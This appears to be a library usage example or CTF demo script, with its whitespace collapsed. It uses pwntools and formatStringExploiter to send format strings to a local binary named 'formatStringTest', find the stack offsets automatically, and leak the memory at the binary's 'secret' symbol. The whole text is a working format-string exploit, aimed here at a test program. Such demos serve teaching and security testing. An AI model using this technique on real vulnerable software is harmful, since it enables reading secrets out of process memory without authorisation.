fromformatStringExploiter.FormatStringimportFormatStringfrompwnimport*importlogginglogging.basicConfig(level=logging.WARN) log=logging.getLogger() elf=ELF("formatStringTest") # Defining format string executor heredefexec_fmt(s): p=process("./formatStringTest",buffer_fill_size=0xffff) p.sendline(s) p.recvuntil("Input a format string: ") out=p.recvuntil("Logged in",drop=True) p.close() returnout# Create the class and self-discover the correct offsetsfmtStr=FormatString(exec_fmt,elf=elf) # Leak some point in memory as a stringfmtStr[elf.symbols['secret']] # Equivalently, but with caching and more smarts...fmtStr.leak.s(elf.symbols['secret'])